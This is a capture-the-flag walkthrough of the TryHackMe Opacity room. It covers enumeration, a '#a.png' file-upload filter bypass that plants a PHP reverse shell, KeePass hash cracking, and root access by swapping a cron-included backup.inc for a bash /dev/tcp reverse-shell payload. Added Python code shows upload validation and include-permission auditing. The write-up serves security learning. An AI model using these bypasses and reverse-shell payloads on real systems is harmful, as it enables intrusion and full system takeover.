TryHackMe Opacity is an easy machine that can help you in the penetration testing learning process. We perform a file upload filter bypass and then exploit a cron job that includes a file from a directory with insufficient permissions. There are 2 hash keys located on the machine (user – local.txt and root – proof.txt). Can you find them and become root?

Initial Enumeration

The process kicks off with network scanning using nmap.

nmap -A <target_IP>

This comprehensive scan (-A switch) reveals the following open ports:

  • Port 22: SSH (Secure Shell)
  • Port 80: HTTP (Hypertext Transfer Protocol) – Identified as the primary initial attack surface.
  • Ports 139 & 445: Samba (SMB/CIFS file sharing)

Web Server Analysis and Exploitation

Navigating to the web server on port 80 initially presents a login form. However, the video sets this login aside and focuses on directory enumeration.

  • Directory Brute-forcing: The tool gobuster is used to discover hidden directories.
gobuster dir -u http://<target_IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This scan uncovers a /cloud directory.

File Upload Vulnerability: The /cloud directory features an interface for uploading files via an external URL. This is identified as a vector for a reverse shell attack. The video specifically mentions using a Pentest Monkey reverse shell (a common PHP reverse shell) and highlights the necessity of configuring the attacker’s IP address and listening port within the shell script.

Hosting the Reverse Shell: To serve the malicious shell script for the upload, a simple Python HTTP server is started on the attacker’s machine.

python3 -m http.server 8000

Bypassing File Extension Filters: The initial upload attempt fails due to server-side validation expecting an image file. A clever bypass technique is demonstrated:

  • The URL of the PHP reverse shell (e.g., shell.php) is given with # followed by a fake image extension appended (e.g., shell.php#a.png).
  • The fragment (everything from # onward) is never sent in an HTTP request, so the server fetches and processes shell.php, while the filter, which looks at the raw URL string, is satisfied by the apparent .png extension.

Triggering the Shell: After a successful upload using the crafted URL (e.g., http://<attacker_IP>:8000/shell.php#a.png), the provided link to the “image” is accessed. Crucially, the #a.png portion is removed from the URL in the browser to ensure the PHP code executes. This action establishes a reverse shell connection back to the attacker’s machine, which is listening for incoming connections (e.g., using nc -lvnp 4545).
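As an added illustration (not code from the original walkthrough or the room), the Python below contrasts the raw-string extension check that the #a.png trick defeats with a check on the parsed URL path plus a magic-number sniff of the fetched bytes; the host 10.0.0.5:8000 in the sample URLs is constructed.

```python
from urllib.parse import urlsplit

IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif")

# Constructed sample URLs: the first mirrors the page's shell.php#a.png trick.
SAMPLE_URLS = [
    "http://10.0.0.5:8000/shell.php#a.png",
    "http://10.0.0.5:8000/photo.png",
    "http://10.0.0.5:8000/photo.png?size=large",
]

def weak_extension_check(url: str) -> bool:
    """The kind of check the page describes: it looks only at the end of the
    raw URL string, so a '#a.png' fragment is enough to satisfy it."""
    return url.lower().endswith(IMAGE_EXTS)

def hardened_extension_check(url: str) -> bool:
    """Check the extension of the path the server will actually request.
    urlsplit() separates the fragment and query, which never reach the remote
    host, so 'shell.php#a.png' is judged as '/shell.php'."""
    return urlsplit(url).path.lower().endswith(IMAGE_EXTS)

# Magic numbers of the image types the filter is meant to allow.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

def sniff_image(data: bytes):
    """Classify fetched bytes by magic number; None means 'not an image'.
    Even a correct path check still trusts the remote server's naming, so the
    content itself has to be inspected before anything is stored."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def accept_remote_upload(url: str, fetched: bytes) -> bool:
    """Accept only when both the requested path and the fetched content look
    like an image. Storing the result under a server-generated name with the
    sniffed extension (never the remote filename) closes the remaining gap."""
    return hardened_extension_check(url) and sniff_image(fetched) is not None

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(u, weak_extension_check(u), hardened_extension_check(u))
```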

User Privilege Escalation

The initial reverse shell provides access as the web server user (often www-data).

  • Shell Stabilization: The raw shell is typically upgraded to a more interactive and stable shell.
  • Internal Enumeration:
    • The home directory of a user named sysadmin (/home/sysadmin) is discovered.
    • Inside, local.txt (likely the user flag) and a scripts directory are found. Attempting to read local.txt fails due to insufficient permissions.
    • Further investigation in /opt reveals a file named data.kdbx. This extension signifies a KeePass password database.
  • KeePass Database Cracking:
    1. Transferring the Database: A Python HTTP server is started on the target machine within the /opt directory to serve the data.kdbx file.
python3 -m http.server 80

Then, wget is used on the attacker’s machine to download it.

wget http://<target_IP>/data.kdbx

Hash Extraction: The keepass2john utility converts the .kdbx file into a hash format that John the Ripper can understand.

keepass2john data.kdbx > keepass_hash.txt

Password Cracking: John the Ripper is used with a wordlist (e.g., rockyou.txt) to crack the master password for the KeePass database.

john --wordlist=/usr/share/wordlists/rockyou.txt keepass_hash.txt

Gaining User Access: The cracked master password opens the data.kdbx file (using KeePassXC or a similar tool), revealing credentials for the sysadmin user. These credentials are then used to log in via SSH.

ssh sysadmin@<target_IP>

Reading the User Flag: Once logged in as sysadmin, the local.txt file can be read.

cat /home/sysadmin/local.txt

Root Privilege Escalation

With sysadmin access, the focus shifts to escalating privileges to root.

  • Analyzing the scripts Directory: The previously found /home/sysadmin/scripts directory contains:
    • Library/ (a subdirectory)
    • skill.php (a PHP script)
  Examining skill.php reveals it’s a backup script that:
    1. Archives the scripts directory.
    2. Copies the archive to /var/backups.
    3. Deletes files from /var/www/html/cloud/images/.
  The script also includes a file named backup.inc from the Library/ subdirectory. It’s likely this script is run periodically by a cron job, potentially as root.
  • Identifying the Vulnerability:
    • An initial idea is to modify skill.php directly. However, skill.php is owned by root and not writable by sysadmin.
    • The key lies in the permissions of the Library/ directory. While Library/backup.inc is owned by root, the Library/ directory itself is owned by sysadmin and is writable by sysadmin.
  • Exploiting Writable Directory:
    1. sysadmin can delete the original Library/backup.inc.
    2. sysadmin can then create a new Library/backup.inc file containing a PHP reverse shell payload (configured with the attacker’s IP and a new listening port).
// Contents of the malicious backup.inc
<?php
// PHP reverse shell code targeting attacker's IP and port
shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<new_port> 0>&1'");
?>
  • Gaining Root Access:
    • A new netcat listener is started on the attacker’s machine on the <new_port>.
    • When the cron job executes skill.php (as root), it will include and execute the malicious Library/backup.inc.
    • This triggers the PHP reverse shell, connecting back to the attacker’s listener with root privileges.
    • The root flag (/root/root.txt) can then be read.
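As an added audit example (not part of the walkthrough and not the room's own code), this Python parses a PHP script for literal include/require paths and reports any include whose file or parent directory a non-root user can write, which is the Library/ misconfiguration described above; the sample tree it builds is constructed, and trusted_uid is an assumed parameter for the uid the cron job runs as.

```python
import os
import re
import stat
from pathlib import Path

# Matches include/require of a literal path, e.g. include('Library/backup.inc');
# paths built dynamically (__DIR__, variables) are not resolved here.
INCLUDE_RE = re.compile(r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")

def included_files(php_script: Path):
    """Return include/require targets of a PHP script, resolved relative to it."""
    text = php_script.read_text(errors="replace")
    return [(php_script.parent / p).resolve() for p in INCLUDE_RE.findall(text)]

def writable_by_untrusted(path: Path, trusted_uid: int = 0) -> bool:
    """True if someone other than trusted_uid (root, for a root cron job) can
    write here: a different owner, or a group/world write bit."""
    st = path.lstat()
    if st.st_uid != trusted_uid:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def replaceable_includes(php_script: Path, stop_at: Path, trusted_uid: int = 0):
    """For each include, walk from the file up to stop_at and report the first
    node an untrusted user can write: a writable parent directory is enough to
    delete and recreate a root-owned file, the Library/backup.inc case."""
    stop_at = stop_at.resolve()
    findings = []
    for inc in included_files(php_script):
        for node in (inc, *inc.parents):
            if not node.exists():
                continue
            if writable_by_untrusted(node, trusted_uid):
                findings.append((str(inc), str(node)))
                break
            if node == stop_at:
                break
    return findings

def make_sample_tree(base: Path, library_mode: int) -> Path:
    """Constructed copy of the page's layout, with Library/ set to library_mode."""
    scripts = base / "scripts"
    lib = scripts / "Library"
    lib.mkdir(parents=True, exist_ok=True)
    (scripts / "skill.php").write_text("<?php\ninclude('Library/backup.inc');\n")
    (lib / "backup.inc").write_text("<?php\n// placeholder include\n")
    os.chmod(scripts, 0o755)
    os.chmod(lib, library_mode)
    os.chmod(lib / "backup.inc", 0o644)
    return scripts
```

Run with trusted_uid set to the uid the cron job runs as (0 on the real box); in a scratch directory owned by yourself, pass your own uid so only the directory mode decides the result.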

This multi-stage attack effectively demonstrates common penetration testing techniques, from initial web server enumeration and exploitation to sophisticated privilege escalation tactics.

TryHackMe Opacity Room Answers

What is the local.txt flag?

What is the proof.txt flag?

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.